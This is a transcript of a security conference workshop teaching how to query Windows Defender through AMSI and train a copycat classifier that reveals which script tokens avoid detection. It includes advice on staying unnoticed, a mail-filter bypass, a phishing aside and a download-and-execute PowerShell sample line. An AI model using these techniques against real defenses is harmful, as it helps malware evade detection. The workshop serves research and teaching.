Done. Okay, is that better? Nice. Nailed it. Thank you for hanging in there.

Okay, so I want to ask: what isn't machine learning? Since math underpins everything we do, I think you get to a point where everything is machine learning. If you think about a child learning to walk, it doesn't look that unfamiliar to a reinforcement learning algorithm teaching something to walk. From an offensive standpoint, I think that's an important distinction, because offensive folks try to live in the realm of possibility rather than in some box we define. If you start thinking of everything as machine learning, you're going to find more opportunities to attack machine learning models, use them in your ops, whatever that might be.

For this attack in particular, we're going to build a copycat model, and I think the concept will come out as we go through it. I'm kind of tired of the name "copycat model," so I'm just going to call these Pink Panther attacks from now on. One, it's more fun. Two, it's still kind of cat-like. And three, the Pink Panther involves a diamond that someone is always trying to steal.

The preconditions for a successful attack are pretty loose. First, a representative data set: in the case of an AMSI provider, that's something like PowerShell or VBA code, a big representative data set of whatever we want to model. Second, the ability to get feedback from our target model. This doesn't have to be direct output. Imagine a model that doesn't hand you back a score but writes it to a Windows event log: you still get your hard label, a hard label being a zero or a one. Even if the model doesn't give you output directly, given the telemetry nature of our networks, it's more likely than not that the output is being recorded somewhere. So rather than going directly at the model, try to think of some binary test you can perform, potentially outside the realm of the machine learning model itself.

It's a pretty simple attack once you get into it. You grab a massive corpus; in this case we found a big PowerShell corpus, something like 400,000 scripts, and we'll talk about that in the lab piece of the workshop. The scripts get fed into an AMSI integration, which came straight off the Windows samples: all it does is load amsi.dll and instantiate a COM object, and we feed it every script in the corpus. That gets passed to Defender, or whatever the AMSI provider might be, and it comes back with a score. We collect those scores offline, and once we have known inputs and know what Defender thinks of each one, we can model the model.

The hardest part about adversarial machine learning isn't the machine learning piece. Most of us don't have to invent math; people much smarter than me have already done that for us. What's difficult is the engineering piece: getting access to the right data, and getting that data in a way that isn't going to get you caught, distributing your traffic accordingly so you can fly under the radar.
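To make that collection loop concrete, here is a hedged sketch of scoring a corpus through AMSI from Python with ctypes. It is not the workshop's amsi_stream.exe, just a minimal stand-in using the documented AmsiInitialize, AmsiOpenSession, AmsiScanBuffer, and AmsiCloseSession calls; the corpus path and app name are placeholders, and it assumes Windows with a registered AMSI provider such as Defender.

```python
# Hedged sketch: score a corpus of scripts through the local AMSI provider.
# Windows-only; the corpus directory and app name are placeholders.
import ctypes
from pathlib import Path

amsi = ctypes.windll.LoadLibrary("amsi.dll")
AMSI_RESULT_DETECTED = 32768  # results >= 32768 mean "detected"

ctx = ctypes.c_void_p()
amsi.AmsiInitialize(ctypes.c_wchar_p("corpus-scanner"), ctypes.byref(ctx))

def scan(content: str, name: str) -> int:
    """Submit one script and return the provider's raw result value."""
    session = ctypes.c_void_p()
    amsi.AmsiOpenSession(ctx, ctypes.byref(session))
    buf = content.encode("utf-16-le")          # AmsiScanBuffer takes raw bytes
    result = ctypes.c_int()
    amsi.AmsiScanBuffer(ctx, buf, len(buf), ctypes.c_wchar_p(name),
                        session, ctypes.byref(result))
    amsi.AmsiCloseSession(ctx, session)
    return result.value

for script in Path("corpus").glob("*.ps1"):    # placeholder corpus directory
    score = scan(script.read_text(errors="ignore"), script.name)
    label = 1 if score >= AMSI_RESULT_DETECTED else 0
    print(f"{script.name},{label}")            # known input -> hard label
```

Collected offline, those (script, label) pairs are exactly the training data the copycat model needs.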
Currently, attackers have pretty free rein and get away with quite a lot of querying and noise on the network. That's not always going to be the case, and I think it's helpful for us to start thinking about limiting our queries and about the information density of a command: a ping versus a process list, for example. With a ping you learn whether a host is up, and you get a TTL, which will tell you the OS. With a process list you get that and more. It just depends on what you're after.

From a machine learning perspective, an offensive perspective, anything can be modeled. If defenders are using machine learning to model whatever logs they're looking at, there's nothing to say that we as offensive folks can't also use machine learning to, say, model C2 traffic. Or say Symantec, or some other product, is blocking you and you can't quite pinpoint why. Machine learning can figure that out for you if you can set up the right experiment. Even though Symantec isn't necessarily using machine learning to look for your C2 traffic, you can still use it to find the relationships between whatever domain or callback interval you're using and whatever the product flags. So I come back to the question: what isn't machine learning? In my mind, if you go back to the math, everything is machine learning, which is kind of fun.

Okay, so in the lab for the workshop, all the code is in there for you. The first half you'll step through, and it'll be very explanatory. As we go on there will be less and less explanation, so you'll be required to look more and ask more questions. Break stuff; you're not going to break it, you can always reset it. Google it, ask us for help. AI Village easily has probably the highest concentration of some of the smartest people in the industry, so many PhDs and super experienced people. I like talking offensive ops, but a lot of people here like talking stats and topology and homology and all this other stuff. The other day I learned there's more than one algebra. This is the place to ask, so go ask.

As you go through, I'd challenge those of you who are more experienced to produce a better and more efficient attack. There's also a massive data set of VBA code in there that I found, something like nine gigs of VBA code. This code would work the same on it, and you could get your name on the leaderboard for CVEs against machine learning systems. If you want to do that, go for it. Feel free to ask questions on Discord; there are no dumb questions, and we have three TAs helping me out here, so if you have specific questions, ask away. Hopefully you have the link and everything. Effectively, this is the workshop: there are two Python notebooks, one is the solutions and one is the workbook. Start with the workbook. If you get stuck, need code help, or just want to grab it and go, the solutions one will work for you.
This amsi.h file is there if you want to compile the amsi_stream.exe so you can recreate the full attack path; you'll need that header file. collect.py is what we used to gather all the information. And this insights.xlsx Excel file is version one of the insights we pulled out of Defender, the Proofpoint-style insight. It is a version one; this is it. Obviously you can see there are a lot of binary blobs in here, but these would be the most malicious tokens, and that makes sense to me: Code, Command. At the bottom you have a giant binary blob and then the least malicious, I shouldn't say commands, the least malicious tokens. So that's free, and you can get started. Any questions right away? I haven't seen any so far. Perfect.

Is anyone getting a 403? Anyone else? I'm not seeing anything in chat on Twitch or Discord. Just reopen the link; it's building the container for me. Okay, me too. Good. I'm in the Jupyter notebook. Nice. I'm going to give you ten or fifteen minutes to rip through the first little bit, and if you have questions... remote is always a bit weird. [Music plays.] "It always gets me in the mood. Can you guys hear that?" "What always gets you in the mood?" "Tron." "I don't think it's a good idea to stream copyrighted music on here." "Oh, right." "Twitch doesn't really have a problem with it, but the YouTube upload at the end will get pulled." "That's fair. I don't spend that much time on the internet." I can send the notebook link again, and others are posting it in the chat. Good.

Okay, so I'm just going to talk; everything's pretty self-explanatory in terms of the instructions. We need to zoom in a little; it's kind of hard to see on the stream. Is that better? "There's a one-year-old here and even I can see it very clearly." Excellent. So I'll talk while you run through it.

The basis of this attack is really the Antimalware Scan Interface, the AmsiScanString and AmsiScanBuffer calls. AMSI is something Microsoft introduced in, I want to say, PowerShell 5, or a little sooner than that. Effectively it's a DLL that gets loaded into PowerShell, the scripting engines (JScript, VBScript), and now .NET 4.8 and beyond. Inside there's a number of blacklisted functions, and whenever one of those functions is called, AMSI gets invoked to scan the content. AMSI is not a security boundary, and it's not a security product; it's an interface. All it does is collect whatever content is being put into the buffer or the string and pass it to an AMSI provider. The AMSI provider then has an opportunity to scan the content and make some determination. Obviously this workshop is about Windows Defender, but there are several other AMSI providers this attack would work against. That's, I suppose, the nice part about machine learning currently: there's a lot of attack surface. Once an AMSI provider scans the content and decides what it is, there's a range of scores it can give. Currently it only gives back 0 or 32768, but in Microsoft's documentation they talk about a range of scores.
So rather than a hard label of zero or one, eventually you'd get some sort of regression-type continuous variable on the output, some heuristic, I suppose. There's a great talk by Microsoft, "Badly Behaving Scripts." It's about an hour long, and I think they gave it two years ago at BlueHat IL. It's two engineers from the machine learning team discussing how AMSI works, the things they're looking for, and the kinds of models they're building. This was our first indication, at least officially, that machine learning was being pushed onto the client. It would seem that overtly malicious things get stopped on the client, but anything in between seems to go to the cloud. One way to test this would be a timing attack: collect the response times from submission to reception of a score, and see if there's a significant difference between the worst scripts and the medium-bad scripts.

You can obviously read, so: the first thing we need to create a copycat is a data set. There's a talk by Daniel Bohannon and Lee Holmes from 2017 called "Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science." Daniel Bohannon wrote Invoke-Obfuscation, which takes a script and puts it through obfuscation: it breaks it up into a million different pieces, so it breaks those brittle regex detections. It's an awesome tool. As part of that research they collected about two gigs' worth of PowerShell scripts and labeled them for us, both benign and malicious. The link is here, so you can go pull it down and rip through it.

Once you have that, the rest is just getting outputs from the target model. If we want to create a copycat, we want to know what Defender thinks of each script we give it, and then we model the model. We have the inputs and we have the outputs; we don't know what's in the middle, that black box, but we can infer it with our own model. You'll never recover 100% of the model, but you might get just enough to bypass Windows Defender for a month, or just one time, or whatever it might be. The nice part about machine learning, and the struggle machine learning has, is that it introduces probability into what used to be a static decision.

The other large file that's interesting is the VBA one: nine gigs of Excel macros that you could do the same thing with, which would be pretty awesome. Let's see, what is this? Right, in this lab you're not on Windows; if this were a full lab we'd have Windows VMs and do this for real. This is just the output from the AMSI stream. So Invoke-WMIBackdoor looks malicious, but Defender doesn't think it's malicious. If you look down, you see the scan result, where 1 is malware and 0 is not; that's our official feedback loop.
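Going back to the timing idea for a second, here is a hedged sketch of what that test could look like. It reuses the hypothetical scan() helper from the earlier AMSI sketch, and the two script lists are placeholders you would fill with your own overtly-bad and borderline samples.

```python
# Hedged sketch of the proposed timing side channel: does a borderline script
# take longer to score (suggesting a cloud round trip) than an obvious one?
import statistics
import time

overtly_malicious_scripts = ["IEX (New-Object Net.WebClient).DownloadString('http://x/a')"]
medium_bad_scripts = ["Add-Type -TypeDefinition $src"]   # placeholder samples

def time_scan(content: str, name: str) -> float:
    start = time.perf_counter()
    scan(content, name)                 # submission to score reception
    return time.perf_counter() - start

worst = [time_scan(s, "worst") for s in overtly_malicious_scripts]
medium = [time_scan(s, "medium") for s in medium_bad_scripts]

# A much larger median latency for the in-between scripts would be consistent
# with a cloud round trip rather than a purely client-side verdict.
print("worst  median:", statistics.median(worst))
print("medium median:", statistics.median(medium))
```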
In that talk above they also discuss the fact that you can't trust file names, and that makes sense. You can't trust headers anymore either. There was some research a number of years ago, three years ago now, against mail filters, where you would null out the first two bytes of a .docm file. Depending on how the mail filter decided what kind of file it was, it would either block it or let it through, because it can't read the magic bytes at the top. Obviously the document is corrupt at that point, but when you open the .docm file, Windows asks you to repair it. And if the user clicks "yes, I'd like to repair this document," your macro lives and you get code execution.

The next bit is the provider display name. Here we have Microsoft Defender Antivirus. If Defender is turned off for whatever reason, or there's no AMSI provider, it'll give you an error and you won't get a score back. The next piece is just PowerView. PowerView is a pretty well-known script, and it's, well, not explicitly malicious, but it's used by malicious people. That's not fair to say: it's used by attackers. I'm sure there are some nice attackers.

For this lab: uploading 380,000 scripts to GitHub was not popular with GitHub, so in this little bit you only have about 3,000, but collect.py has everything you need. In your data folder you have clean and dirty. Dirty should be your malicious scripts, and the clean ones are in clean. There are about 3,000 clean and about 1,200 malicious scripts to look at. Go ahead and start ripping through this code, and look through collect.py as we parse.

Personally, since there are a lot of moving parts in machine learning that you just can't get away from, whenever possible I like to build a data structure at each step and keep the previous output. It works for me; most of my data sets are pretty small anyway, so it's manageable. You can see it with Get-Screenshot here: this is the original file name, this is the MD5 hash of the content, this is the result, whether it's malware, and then the base64-encoded text that you can go through. I like this because if there's any weirdness, you have everything you need right in front of you. You don't have to start again at a particular point or go back to the beginning of the process. Being able to debug all the way through your pipeline might cost you some speed, but at least for me it's fine; I'm not dealing with billions of things.

Okay, so we just discussed lists. If you're not familiar with a list... I think most of you probably are. Raise your hand if you're familiar with lists. Nice, that's about 20% of you; I can't hear any giggling. Lists are really nice: you can split a string on any delimiter you want and get one back. Quick question from the Twitch chat, Will: when someone clicks on a file in clean, should they be able to view the PowerShell code, or will they get a mess of characters rather than a script? Yes, you can view it.
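To show what one of those pre-parsed records looks like, here is a hedged sketch. The record line and hash are made up for illustration; the four fields (name, MD5, Defender result, base64 body) follow the layout just described.

```python
# Hedged sketch: parse one record from the pre-parsed corpus into its fields.
import base64

line = "Get-Screenshot.ps1,abc123,1,SW52b2tlLVRoaW5n"   # illustrative record, not real data

fields = line.strip().split(",")                 # lists: split on any delimiter you want
name, md5, result, b64 = fields[0], fields[1], int(fields[2]), fields[3]

script = base64.b64decode(b64).decode("utf-8", errors="ignore")
print(name, "-> malware" if result == 1 else "-> clean")
print(script)                                    # peek at the decoded PowerShell
```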
So in this little code block here, you can open it; we've already parsed it for you, because it would just take forever otherwise. What you're going to see is the script name (the original name), the MD5 hash of the script content, the AMSI result, or I should say the Defender result, what Defender thinks of the script, and then the base64-encoded version of the script.

That's what we're doing here: splitting a file. What we're setting up, eventually, is ripping through all of these files and building a big vocabulary. I just pulled one out as an example. Since this is just a list, we can index it however we want. You can slice with a colon, from index one to the end, or from index one to the third. Or you can use a negative index to reach from the end of the list and just grab the script content.

If we're going to look at the script content... it's interesting that Get-Screenshot is counted as malicious. If we decode it, we can have a look, and maybe there's some knowledge we have that explains why it might be malicious. We're just using split to make it a little nicer. (And there's a typo right there. It's a double typo now. Actually, this isn't the solutions notebook, so you'd already know that.) To make it nicer still, we're going to split it again and get a list of the tokens. In this list, to my mind, some of the more malicious things would be the Add-Type assembly loading, the Convert ToInt32 calls, New-Object IO.MemoryStream: anything like in-memory attacks, any sort of memory streams. And at the bottom you also have the Base64String conversion; base64 is typically something that gets picked up quite easily. If you wanted to figure out why Defender thought this was malicious, does anybody have any ideas they want to type out? Anybody typing? Doesn't seem like anybody's typing on Discord right now. Nice.

So we're just going to go through with a dictionary. This is just what I came up with: try to determine the commonality between all the malicious scripts and see what tokens, and when I say tokens I mean words, come out on top. To do this we'll use a dictionary, which is a key-value store. I'll let you run through that; dictionaries are pretty awesome. I like dictionaries, but there is one other data structure I like even more. Excellent, so we know what dictionaries are now. We're going to decode the content and add it all to a dictionary, but we're only going to do one script (there's a quick recap of the list moves in the sketch below). Does anybody know why we might only want to do one for now? "Because it's good practice."
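Here is a hedged recap of the indexing and slicing moves on an illustrative parsed record; the field values are made up.

```python
# Hedged sketch of the list-indexing moves described above.
record = ["Get-Screenshot.ps1", "abc123", "1", "QWRkLVR5cGU="]  # illustrative fields

print(record[0])      # index directly: the script name
print(record[1:])     # slice from index one to the end
print(record[1:3])    # slice from index one up to, but not including, index three
print(record[-1])     # negative index reaches from the end: the base64 content
```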
Good practice, exactly. When you're dealing with, I don't know, thousands of scripts, half a million scripts, if something is going to mess up halfway through and you start down that path, you're just going to waste a lot of time fixing errors. If you can get it to work with one, then 10, then 50, then 1,000, that's a much better way to go about processing large data sets. For this one we'll just do one, but we're going to split it twice, and then add everything to the word index. There's a fill-in-the-blank bit here, so go ahead and run that code and tell me what the issue is. I'll give you a clue: it's on the line with all the question marks. (I didn't know I needed to be this close to the microphone. Or are you already way, way past this?)

To get a proper count of the words as we go through them, we need to add one each time. You would have been able to tell after you ran it, because only one occurrence was listed for each token, but every script has at least one. If we fix that, we get a better representation of what's out there. On going one at a time: I used to have a real issue with loops where I wouldn't break out of them properly, and doing it a little more slowly, at least the first time through, has helped me.

Then we just sort the dictionary by token count. So now: the equals sign, there are nine of them; six curly brackets; four New-Objects. There's a lot of punctuation in there, but we can deal with that later. Now, because we're impatient and just want to get to the machine learning, we're going to run through all of the malicious scripts. It might take a little bit on Binder, and it might even take a little bit here. I wish I could have shipped all of the scripts to you.

Okay, now we sort the words. This is all of the tokens for all of the malicious scripts, and it isn't ideal: there are a lot of numbers, which is fairly common when you're tokenizing text. The nice bit is we're seeing GetProcAddress. Does anybody know what operation GetProcAddress might be used in? Anybody who works at an AV vendor? You can Google it if you want. Nobody? GT? Any penetration testers, malware authors, anybody? "I'm a data scientist." That's fair, I'll let you look it up. It's typically used when you're looking up functions in other DLLs, most notably, I think, in process injection. Anyway, there are a lot of numbers, which is fairly classic, but we're also seeing write-bytes-to-memory, memory addresses, remote process handles, a lot of malware-type things, and obviously this is all PowerShell. The numbers are actually kind of annoying, so let's scroll through. Are there any tokens in there that are particularly interesting to anybody? Okay: Rob, logistic aggression, managed to answer the question in the Twitch chat. Thanks, Rob, I knew I could count on you. What was it? He said you use it to get the address of a DLL function in memory, and it's also heavily used in packers. Yeah, exactly. Okay, so the next bit: we're just going to continue to filter down.
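Looping back to that fill-in-the-blank step, here is a hedged sketch of the fixed counting loop, reusing the illustrative record from the slicing sketch above.

```python
# Hedged sketch of the word-count step, including the "+ 1" fix the blank asks for.
import base64

word_index: dict[str, int] = {}

script = base64.b64decode(record[-1]).decode()   # one script for now
for raw_line in script.splitlines():             # split once on newlines...
    for token in raw_line.split():               # ...and again on whitespace
        # The bug the blank hides: without "+ 1" every token sits at its initial
        # count, so each word looks like it occurs exactly once.
        word_index[token] = word_index.get(token, 0) + 1

# Sort by count, descending, the way the notebook does.
for token, count in sorted(word_index.items(), key=lambda kv: kv[1], reverse=True)[:20]:
    print(count, token)
```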
And that's generally the case with most of your data. Most of your time in machine learning isn't spent on the math piece you typically think of; it's processing data, filtering data, making sure your data sets are balanced or have the distribution you want, whatever it might be. I said earlier that we're not inventing new math; I'm not going to be the guy who invents new math. So the place I can be most effective is applying my domain knowledge to what I know of machine learning, and being extra careful with my data. Abraham Lincoln has a saying about sharpening an axe; I can't remember exactly what it is. Right: if I had ten hours to cut down a tree, I'd spend the first eight sharpening my axe. That sounds right, though I could have made it up. The same is true for machine learning, and I'd say for data science. Komath, do you want to chime in as a data scientist, is that true or not? "Yeah, I tend to first get something that works, then go back and perfect it to make sure I don't have little mistakes. Because when you scale things up, it really screws you when there's a bug 0.1% of the time: now you have 100,000 things and the bug is basically guaranteed to happen. It's better to clean it up before you scale." And if you're a data scientist in the Twitch chat, what do you think the percentage is of cleaning versus actual machine learning, data processing versus machine learning? I think that would be interesting. And if you're new to machine learning: it's okay to be impatient and go really fast because you want the end result, but if you want quality results, it's better to go a little slower.

Okay, so we're going to create a new list. The difference here is we're using a findall: we start removing punctuation and numbers, add what's left to a new list, and then print the top 100 tokens. All the numbers are gone and a lot of the punctuation is gone; that looks quite a bit better than before. We still have GetProcAddress, we're still seeing the malicious tokens we'd expect, shellcode, the memory writes. So we haven't completely ruined our, I want to call them the crispy bits; we haven't ruined what we want to model.

For this bit, I just picked some tokens: go Google them and see what comes up. That's kind of fun, and since we're live, I can do that. Let's see. ("You're using Edge? That's embarrassing.") Have you heard of Mimikatz? Do you know if that one's malicious? Yeah, I'd say so. This PowerShell one, just like it, malicious, yeah, definitely. And I'd say, as operators, a lot of the industry uses a lot of the same scripts, like the DLL injection script. So these are malicious-text scripts. Okay, so once we have that bit, we could stop here, right? (The filtering pass itself looks roughly like the sketch below.)
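Here is a hedged sketch of that findall filtering pass; the sample script text is a placeholder standing in for the decoded malicious corpus.

```python
# Hedged sketch of the re.findall pass: keep word-like tokens, drop numbers
# and punctuation, then rank the survivors.
import re
from collections import Counter

decoded_malicious_scripts = [
    "$p = GetProcAddress $h 'VirtualAlloc'; $sc = 0x41,0x42 { WriteByte }",
]  # placeholder: decoded script texts

filtered: list[str] = []
for script in decoded_malicious_scripts:
    # Letters-only runs: "GetProcAddress" survives, "0x41" and "{" do not.
    filtered.extend(t for t in re.findall(r"[A-Za-z]+", script) if len(t) > 2)

for token, count in Counter(filtered).most_common(100):   # top 100 tokens
    print(count, token)
```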
So we have some malicious tokens: all of these are words that came from scripts Defender labeled as malicious. We could stop here, theoretically, and write malicious scripts that never use any of these words. Alternatively, you could do the same with the clean scripts and only use words from those, or you could do both. I think that would probably work, but you'd have a hard time making it repeatable, and if it suddenly stopped working, I don't think you'd have much recourse for figuring out how or why. This is where machine learning shines for us: the ability to iterate through massive amounts of data extremely quickly.

I'll use the GPT-2 phishing analogy: you can spend an hour crafting one phish for five targets, or you can spend an hour correcting five unique phishes that GPT-2 generated for five targets. Language models aren't perfect, but they do help you scale. You generate five of them, correct them, make them seem realistic and not sound terrible, in the same time it would take to write one. In terms of pulling insights out of Windows Defender, I think the same holds.

All right, so we're getting to the machine learning bit. In this manual we reference 380,000 scripts; I think there are 410,000 in the whole set, and the PowerShell link at the top has all of them. I just chose the biggest folder and fed those in for the insights.

Now we get into data representation. Data representation is probably my favorite part of machine learning. It's really where you get to shape the output; not the model, because the model has some architecture, but you get to encode and embed your domain knowledge. I guess it'd be called feature engineering, correct me if I'm wrong, and that piece is extremely important. The accuracy of your model is directly correlated with the quality of your data representation and your feature engineering. It's my favorite part.

Okay, GT went through tokenization earlier today, and we've already played with it, but tokenization is effectively the process of splitting text into separate words: you piece sentences out into a list. Rather than write the tokenizer ourselves, like we did up here, I'd imagine there are better developers out there, and I trust their code more than my own for some of this stuff. So imagine this corpus is actually just our big PowerShell list, where each line is a PowerShell script. We call fit_on_texts, and that just creates an index, those data structures, and you can see each word gets its own integer (a hedged sketch follows).
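Here is a minimal sketch of that fit step, assuming the Keras preprocessing Tokenizer and a toy corpus standing in for the PowerShell list.

```python
# Hedged sketch of the tokenizer fit on a toy corpus (one "script" per entry).
from tensorflow.keras.preprocessing.text import Tokenizer

corpus = [
    "New-Object Net.WebClient DownloadString",
    "Add-Type GetProcAddress VirtualAlloc",
    "Write-Output Hello World",
]

tokenizer = Tokenizer()
tokenizer.fit_on_texts(corpus)          # builds the word -> integer index
print(tokenizer.word_index)             # note: default filters strip '-' and '.'
print(tokenizer.texts_to_sequences(corpus[:1]))   # first script as integers
```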
In a text-prediction scenario, sequences are really nice, because you can say what number comes after what and go back to your index and look it up. So if your example is "my cat likes mittens", and I don't have a cat, but I assume cats like mittens, or most cats are cold without mittens, we're just taking the first entry and tokenizing it. It's a word index; it's fairly straightforward.

There are a number of ways to represent text. You have machine learning models that'll do it, you have frequency models, you have TF-IDF, term frequency inverse document frequency, which is like a weighted frequency. What else am I missing? Obviously one-hot encoding, which is where we're going next. One-hot encoding is basically a vector the length of your vocabulary, where the presence of a token, a word, is denoted by a one, and if it doesn't exist in a document, it's a zero. So what we end up getting is, let's see how long this one is... it's only 17, so each vector is going to be 17 integers long, and the array is going to look like this. This is just the first sentence. As we go through, you'll see that as the words change, you get different... what do you call them? Not indications; activations is probably incorrect too. Different positions set. Hopefully that makes a little bit of sense. The nice part of one-hot encoding is that every token is represented; the trade-off is sparsity, so if you have a really big corpus or vocabulary, you get a lot of zeros in there. But it's really nice if you only care about the presence of a word. It doesn't keep the semantics or the syntax, and it's not very good for text prediction, but it is good for classification, which is exactly what we want to do (there's a small sketch of it below). All right, so now we have an idea of what tokenization does and the tokenization scheme we're going to use.
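A hedged, by-hand sketch of that one-hot presence encoding, using the toy corpus from the previous sketch:

```python
# Hedged sketch: one-hot presence vectors built by hand over the toy corpus.
vocab = sorted({w for doc in corpus for w in doc.lower().split()})
print(len(vocab), "words in the vocabulary")    # vector length = vocab size

def one_hot(doc: str) -> list[int]:
    words = set(doc.lower().split())
    return [1 if w in words else 0 for w in vocab]   # 1 = word present in this doc

for doc in corpus:
    print(one_hot(doc), "<-", doc)
```

In practice, the Keras tokenizer's texts_to_matrix with mode="binary" produces the same idea as a matrix, which is likely the framework route you'd take.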
Now we get into my favorite data structure: namedtuples. Namedtuples are immutable; well, they're tuples, but they're like immutable classes. You can create them, set your fields to whatever you want, and then reference a field inside the tuple by name, which makes your code read a lot cleaner than a plain tuple or a list, or even a dictionary. Actually, I don't know the speed difference between dictionaries and namedtuples; does anybody? Maybe not. But here's an example of a namedtuple. You know when you find something you like and you use it absolutely everywhere? That's where I'm at with namedtuples. They're just super nice.

In this code we're going to create our training structure. You should be familiar with everything in this code block by now. We have our filter (the tokenizer has a filter attached to it, if you want to use that one), we create a primary list to hold all of our training data, and then we create a list that we'll use for tokenizing. Eventually, when you start building these small pieces, there's a point where they all come together and you can transition from processing into learning, and this is where we do that. We've built all these tiny pieces out, and you can see how they're coming together. There are two really important things happening in this little code block: the tokenization, and collecting all of the namedtuples. We go through every malicious script, decode it as we did before, remove all the punctuation, split it, and unique it. I did the uniquing because I assume it makes tokenization faster, but as I said, I don't have any evidence for that; it just seemed to make sense. Maybe you can test it and let me know. We then rejoin the unique words into a sentence, add them to a namedtuple, and add that namedtuple to a list. The important piece here is the label: for malware the label is a one, and for clean scripts it's a zero. This is where we create our training structure (a hedged sketch follows below).

The other thing you might notice: originally we ran this on 380,000 scripts, but for this workshop, and GitHub really didn't like it, we only gave you 3,000. That's still about two to one, but when you have 380,000 scripts versus roughly 1,200 malicious scripts, your data is very unbalanced. If, for example, you did a similar scheme to the one we did earlier with just the malicious scripts, but for both classes, what might happen is that your clean-script words start to... what's the word? Eric, Spin, what's the technical term? I'm going to say drown out, or average out, whatever it might be. It's like when your GPA is really bad: eventually you just can't pull it back up.

So the outcome of this is a list holding all of our namedtuples, ready to be fed into a model, and all of our documents ready to be tokenized. At the end we just build a vocab over everything. This one is a little slow; it takes a while to go through all of them. Also, you probably know this, but if you open these files in Vim, it creates a swap file. I helped debug an issue where someone was opening their data files inside a folder and running Python out of the same folder, and Python was trying to tokenize the swap file; they couldn't figure out the error. Anyway. Now we have our vocab, and we can see the tokens that came out after our filtering. The closer you get to training, the happier you want to be with the words you're seeing, and I'm happier with this than when we started. You definitely play it by ear, but it's useful to take a moment and look. RemoteDllHandle: that's going to be useful.
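Here is a hedged sketch of that labeling loop. The Sample type, the field names, and the two record iterables are illustrative, not necessarily what the notebook calls them.

```python
# Hedged sketch of the labeled training structure built from namedtuples.
import base64
import re
from collections import namedtuple

Sample = namedtuple("Sample", ["name", "label", "text"])

malicious_records = [("Invoke-Thing.ps1", "R2V0UHJvY0FkZHJlc3M=")]  # placeholder pairs
clean_records = [("Hello.ps1", "V3JpdGUtT3V0cHV0")]

all_text: list = []
docs: list[str] = []

def to_sample(name: str, b64: str, label: int) -> Sample:
    raw = base64.b64decode(b64).decode(errors="ignore")
    tokens = sorted(set(re.findall(r"[A-Za-z]+", raw)))   # dedupe, drop punctuation
    return Sample(name, label, " ".join(tokens))

for name, b64 in malicious_records:
    s = to_sample(name, b64, 1)          # 1 = malware
    all_text.append(s)
    docs.append(s.text)

for name, b64 in clean_records:
    s = to_sample(name, b64, 0)          # 0 = clean
    all_text.append(s)
    docs.append(s.text)

print(all_text[0].name, all_text[0].label)   # reference tuple fields by name
```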
Let's try one more thing. This is something I haven't dealt with, and you can see it in the insights.xlsx, but if you were going to deal with it, this is probably how: a regex for this TVqQAAMA prefix. Does anybody know what that is? I bet Rob does; I see you Binging it. Yeah, it's embarrassing that that's the best way to Google it. It indicates a base64-encoded PE file, compressed or embedded in some other medium. You'd want to remove those, obviously. I didn't.

Okay, so now we're at the point I already described, but if you're not familiar with machine learning at all, there's a little video series by, what's his name? I don't know, but his YouTube channel is 3Blue1Brown. It's four videos, about an hour, and it's really good, way better than I will ever be at explaining machine learning to you. I recommend watching it a couple of times, and if you're really into math, he has a lot of other cool stuff; his animations are really good.

Neural networks: we've all seen this picture. The input layer represents our input data, our one-hot encoded text. The hidden layers apply activation functions. The output layer is the result of the network: a classification, a prediction, whatever it might be. Machine learning is much more than this little picture we see everywhere; I'd say this is the tiniest little bit of it, and even inside this picture the mechanics going on are quite extensive. And this is just the most vanilla implementation. The nice part about Keras and the other frameworks is that they bring that kind of power to non-mathematicians, or non... what do you call non-mathematicians, Spin? Is there an industry word? "Students." Students, yeah, something like that. "Normies." Normies, yeah. "Honestly, we just don't think about non-mathematicians." I don't want to dig myself into a hole here. "You've got too much math to think about." As a non-mathematician, I'll take credit for that one. "Lay people." Yeah, lay people.

If you are one: the first book I read was Make Your Own Neural Network by Tariq Rashid, and it was the most basic, most straightforward explanation of a neural network, about 120 pages. There are a bajillion tutorials out there, and they're okay, but they're always so quick to get into a framework without actually explaining what's going on underneath, and that's a hindrance. You don't have to be a mathematician to use machine learning, but you should at least spend time learning the basics.

Okay, let's see. That was the little explanation of machine learning. We have our train set, and we're happy with the tokenization to a point; happy enough for now, anyway. Eventually you always want to be moving forward, so you want to be thinking in pipelines. I wouldn't spend too much time in any one area, but when you build something, make it modular so it can drop into a pipeline. So now we need to tokenize all the documents. This takes a list, which I think docs is; we'll find out. Nice. Let's double-check. And now we'll create our score array (both steps are sketched below).
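A hedged sketch of those two steps, tokenizing every document into the one-hot matrix and building the matching label array, assuming the docs list and Sample namedtuples from the earlier sketch:

```python
# Hedged sketch: one-hot matrix for every document plus the label (score) array.
import numpy as np
from tensorflow.keras.preprocessing.text import Tokenizer

tokenizer = Tokenizer()
tokenizer.fit_on_texts(docs)                                   # vocab over everything

text_matrix = tokenizer.texts_to_matrix(docs, mode="binary")   # rows = scripts
score_matrix = np.array([e.label for e in all_text])           # 1 = malware, 0 = clean
print(text_matrix.shape, score_matrix.shape)
```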
Here we have the namedtuples we're going to iterate through; we're referencing e, which is a terrible variable name, sorry, and all_text is the list holding all of our namedtuples. This is a list comprehension, another favorite of mine: put an expression inside square brackets and it creates a list for you. You can see we're referencing the label. So we're just creating a score matrix, and you can see what that looks like. These are giant arrays, and the reason is that the mechanics of machine learning are, would you say, rooted in matrix multiplication? "No, because that ignores all of the decision trees and a bunch of other things." "And k-nearest neighbors, and a bunch more." Yeah. When I was talking about this picture being the only picture we ever see: it's just one of the smallest pieces. There's so much more out there that you should look at, and that I probably could have introduced you to.

Anyway, now we have our score matrix. Actually, looking at this: okay, these are all our labels. When the network is learning, it calculates a loss. It takes an input, and at the end it takes whatever the label was and sees how close the prediction came. A large loss is bad and a small loss is good. Through gradient descent and backpropagation, the network updates the weights such that the next time it sees something like that input, it'll hopefully be closer. We'll get into that.

